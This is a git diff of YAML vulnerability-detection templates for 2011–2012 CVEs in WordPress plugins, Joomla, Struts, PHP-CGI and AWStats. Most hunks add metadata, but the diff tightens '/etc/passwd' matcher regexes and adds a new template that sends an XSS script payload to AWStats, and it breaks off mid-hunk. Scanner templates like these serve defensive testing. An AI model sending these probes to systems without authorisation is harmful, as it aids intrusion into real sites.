b/cves/2011/CVE-2011-4804.yaml index f7dc717b28..e24a860822 100644 --- a/cves/2011/CVE-2011-4804.yaml +++ b/cves/2011/CVE-2011-4804.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component com_kp - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/36598 - https://www.cvedetails.com/cve/CVE-2011-4804 + - http://secunia.com/advisories/46844 + - http://www.securityfocus.com/bid/48944 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-4804 tags: cve,cve2011,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml index bbefdb8002..3a272db8c2 100644 --- a/cves/2011/CVE-2011-4926.yaml +++ b/cves/2011/CVE-2011-4926.yaml @@ -1,11 +1,17 @@ id: CVE-2011-4926 info: - name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 + - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 + - http://www.openwall.com/lists/oss-security/2012/01/10/9 + classification: + cve-id: CVE-2011-4926 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml index fb203bd625..a1b5beded0 100644 --- a/cves/2011/CVE-2011-5106.yaml +++ b/cves/2011/CVE-2011-5106.yaml @@ -1,11 +1,17 @@ id: CVE-2011-5106 info: - name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + - https://wordpress.org/plugins/flexible-custom-post-type/#developers + - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type + - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/ + classification: + cve-id: CVE-2011-5106 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml index ef7a3e99a4..a66ddac418 100644 --- a/cves/2011/CVE-2011-5107.yaml +++ b/cves/2011/CVE-2011-5107.yaml @@ -1,11 +1,17 @@ id: CVE-2011-5107 info: - name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) + name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 + description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ + - http://www.securityfocus.com/bid/50743 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413 + - http://www.securityfocus.com/archive/1/520590/100/0/threaded + classification: + cve-id: CVE-2011-5107 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml index fc3dcab6fe..69c024bbb5 100644 --- a/cves/2011/CVE-2011-5179.yaml +++ b/cves/2011/CVE-2011-5179.yaml @@ -1,11 +1,17 @@ id: CVE-2011-5179 info: - name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) + name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 + description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 + - http://www.securityfocus.com/bid/50824 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 + - http://www.securityfocus.com/archive/1/520662/100/0/threaded + classification: + cve-id: CVE-2011-5179 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml index c7e74be15b..d50e65e43c 100644 --- a/cves/2011/CVE-2011-5181.yaml +++ b/cves/2011/CVE-2011-5181.yaml @@ -1,11 +1,17 @@ id: CVE-2011-5181 info: - name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + - http://www.securityfocus.com/bid/50778 + - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ + - http://osvdb.org/77338 + classification: + cve-id: CVE-2011-5181 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml index 5412865a18..63641aacf6 100644 --- a/cves/2011/CVE-2011-5265.yaml +++ b/cves/2011/CVE-2011-5265.yaml @@ -1,11 +1,17 @@ id: CVE-2011-5265 info: - name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) + name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 + description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 + - http://osvdb.org/77337 + - http://www.securityfocus.com/bid/50779 + - http://archives.neohapsis.com/archives/bugtraq/2012-04/0120.html + classification: + cve-id: CVE-2011-5265 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml index 011cc75b69..40e158645e 100644 --- a/cves/2012/CVE-2012-0392.yaml +++ b/cves/2012/CVE-2012-0392.yaml @@ -5,8 +5,15 @@ info: author: pikpikcu severity: critical description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. - reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 - tags: cve,cve2012,apache,rce,struts + reference: + - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 + - http://www.exploit-db.com/exploits/18329 + - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html + - http://secunia.com/advisories/47393 + remediation: Developers should immediately upgrade to at least Struts 2.3.18. + classification: + cve-id: CVE-2012-0392 + tags: cve,cve2012,apache,rce,struts,java requests: - method: GET @@ -18,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0896.yaml b/cves/2012/CVE-2012-0896.yaml index 5e2ad102d4..bda61c73ec 100644 --- a/cves/2012/CVE-2012-0896.yaml +++ b/cves/2012/CVE-2012-0896.yaml @@ -4,11 +4,15 @@ info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo severity: high - description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. reference: - https://packetstormsecurity.com/files/108631/ - https://www.cvedetails.com/cve/CVE-2012-0896 - tags: cve,cve2012,lfi,wordpress,wp-plugin + - http://secunia.com/advisories/47529 + - http://plugins.trac.wordpress.org/changeset/488883/count-per-day + classification: + cve-id: CVE-2012-0896 + tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal requests: - method: GET @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml index 728c0ccd73..fd9c3dfd13 100644 --- a/cves/2012/CVE-2012-0901.yaml +++ b/cves/2012/CVE-2012-0901.yaml @@ -1,11 +1,16 @@ id: CVE-2012-0901 info: - name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) + name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 + classification: + cve-id: CVE-2012-0901 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0981.yaml b/cves/2012/CVE-2012-0981.yaml index 549281d0ab..eef133b20b 100644 --- a/cves/2012/CVE-2012-0981.yaml +++ b/cves/2012/CVE-2012-0981.yaml @@ -4,10 +4,14 @@ info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. reference: - https://www.exploit-db.com/exploits/18435 - https://www.cvedetails.com/cve/CVE-2012-0981 + - http://secunia.com/advisories/47802 + - http://www.exploit-db.com/exploits/18435 + classification: + cve-id: CVE-2012-0981 tags: cve,cve2012,lfi,phpshowtime requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml index 338de87d83..3a27e8c3a6 100644 --- a/cves/2012/CVE-2012-0991.yaml +++ b/cves/2012/CVE-2012-0991.yaml @@ -8,7 +8,11 @@ info: reference: - https://www.exploit-db.com/exploits/36650 - https://www.cvedetails.com/cve/CVE-2012-0991 - tags: cve,cve2012,lfi,openemr + - http://osvdb.org/78729 + - http://www.securityfocus.com/bid/51788 + classification: + cve-id: CVE-2012-0991 + tags: cve,cve2012,lfi,openemr,traversal requests: - method: GET @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0996.yaml b/cves/2012/CVE-2012-0996.yaml index b096e5a0ba..2d2791b54e 100644 --- a/cves/2012/CVE-2012-0996.yaml +++ b/cves/2012/CVE-2012-0996.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/36784 - https://www.cvedetails.com/cve/CVE-2012-0996 + - https://www.htbridge.ch/advisory/HTB23071 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2012-0996 tags: cve,cve2012,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2012/CVE-2012-1226.yaml b/cves/2012/CVE-2012-1226.yaml index 40b0d31332..f16733f1e9 100644 --- a/cves/2012/CVE-2012-1226.yaml +++ b/cves/2012/CVE-2012-1226.yaml @@ -8,7 +8,12 @@ info: reference: - https://www.exploit-db.com/exploits/36873 - https://www.cvedetails.com/cve/CVE-2012-1226 - tags: cve,cve2012,lfi + - http://www.securityfocus.com/archive/1/521583 + - http://www.vulnerability-lab.com/get_content.php?id=428 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2012-1226 + tags: cve,cve2012,lfi,dolibarr,traversal requests: - method: GET @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index 0a1111e02c..9d3b2cfa7f 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml @@ -1,14 +1,18 @@ id: CVE-2012-1823 info: - name: PHP CGI v5.3.12/5.4.2 RCE + name: PHP CGI v5.3.12/5.4.2 Remote Code Execution author: pikpikcu severity: critical + description: | + sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. reference: - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 - description: | - sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + - https://bugs.php.net/bug.php?id=61910 + - http://www.php.net/ChangeLog-5.php#5.4.2 + classification: + cve-id: CVE-2012-1823 tags: rce,php,cve,cve2012 requests: @@ -22,12 +26,13 @@ requests: matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/04/04 diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index a176328129..754535a598 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -1,11 +1,17 @@ id: CVE-2012-1835 info: - name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + - http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html + - http://www.securityfocus.com/bid/52986 + - https://www.htbridge.com/advisory/HTB23082 + classification: + cve-id: CVE-2012-1835 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -32,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml index b41122ff02..ba5d5cbe03 100644 --- a/cves/2012/CVE-2012-2371.yaml +++ b/cves/2012/CVE-2012-2371.yaml @@ -1,11 +1,17 @@ id: CVE-2012-2371 info: - name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS) + name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + - http://secunia.com/advisories/49143 + - http://www.openwall.com/lists/oss-security/2012/05/15/12 + - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html + classification: + cve-id: CVE-2012-2371 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml old mode 100755 new mode 100644 index d624c59d99..f130b705fd --- a/cves/2012/CVE-2012-3153.yaml +++ b/cves/2012/CVE-2012-3153.yaml @@ -5,12 +5,16 @@ info: author: Sid Ahmed MALAOUI @ Realistic Security severity: critical description: | - Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, + An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 + - https://www.oracle.com/security-alerts/cpuoct2012.html + - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html + classification: + cve-id: CVE-2012-3153 tags: cve,cve2012,oracle,rce requests: @@ -45,3 +49,5 @@ requests: name: linux_working_path regex: - "/.*/showenv" + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index ed80489fb4..8c40135569 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -1,12 +1,17 @@ id: CVE-2012-4242 info: - name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html + - http://www.securityfocus.com/bid/55622 + classification: + cve-id: CVE-2012-4242 tags: cve,cve2012,wordpress,xss,wp-plugin - description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." requests: - method: GET @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4253.yaml b/cves/2012/CVE-2012-4253.yaml index 7bc7888e98..e9211386c2 100644 --- a/cves/2012/CVE-2012-4253.yaml +++ b/cves/2012/CVE-2012-4253.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/37129 - https://www.cvedetails.com/cve/CVE-2012-4253 + - http://www.osvdb.org/81609 + - http://www.osvdb.org/81615 + classification: + cve-id: CVE-2012-4253 tags: cve,cve2012,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml index 99a6f52d88..be18341253 100644 --- a/cves/2012/CVE-2012-4273.yaml +++ b/cves/2012/CVE-2012-4273.yaml @@ -1,11 +1,17 @@ id: CVE-2012-4273 info: - name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 + - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ + - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html + classification: + cve-id: CVE-2012-4273 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4547.yaml b/cves/2012/CVE-2012-4547.yaml new file mode 100644 index 0000000000..4a35ca2a5e --- /dev/null +++ b/cves/2012/CVE-2012-4547.yaml @@ -0,0 +1,40 @@ +id: CVE-2012-4547 + +info: + name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + reference: + - https://www.exploit-db.com/exploits/36164 + - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 + - http://awstats.sourceforge.net/docs/awstats_changelog.txt + - http://openwall.com/lists/oss-security/2012/10/29/7 + classification: + cve-id: CVE-2012-4547 + tags: cve,cve2020,xss,awstats + +requests: + - method: GET + path: + - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml index 5c198776f4..d5f361f8f6 100644 --- a/cves/2012/CVE-2012-4768.yaml +++ b/cves/2012/CVE-2012-4768.yaml @@ -1,11 +1,17 @@ id: CVE-2012-4768 info: - name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt + - http://osvdb.org/85319 + - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + classification: + cve-id: CVE-2012-4768 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml index 8b3e35a428..1e1bfafaff 100644 --- a/cves/2012/CVE-2012-4878.yaml +++ b/cves/2012/CVE-2012-4878.yaml @@ -4,11 +4,15 @@ info: name: FlatnuX CMS - Directory Traversal author: daffainfo severity: high - description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. reference: - https://www.exploit-db.com/exploits/37034 - https://www.cvedetails.com/cve/CVE-2012-4878 - tags: cve,cve2012,lfi + - http://www.vulnerability-lab.com/get_content.php?id=487 + - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html + classification: + cve-id: CVE-2012-4878 + tags: cve,cve2012,lfi,traversal requests: - method: GET @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml index c458850e5e..9a3d75d231 100644 --- a/cves/2012/CVE-2012-4889.yaml +++ b/cves/2012/CVE-2012-4889.yaml @@ -1,13 +1,17 @@ id: CVE-2012-4889 info: - name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS) + name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. reference: - https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 + - http://osvdb.org/80873 + - http://osvdb.org/80872 + classification: + cve-id: CVE-2012-4889 tags: cve,cve2012,xss,manageengine requests: @@ -30,3 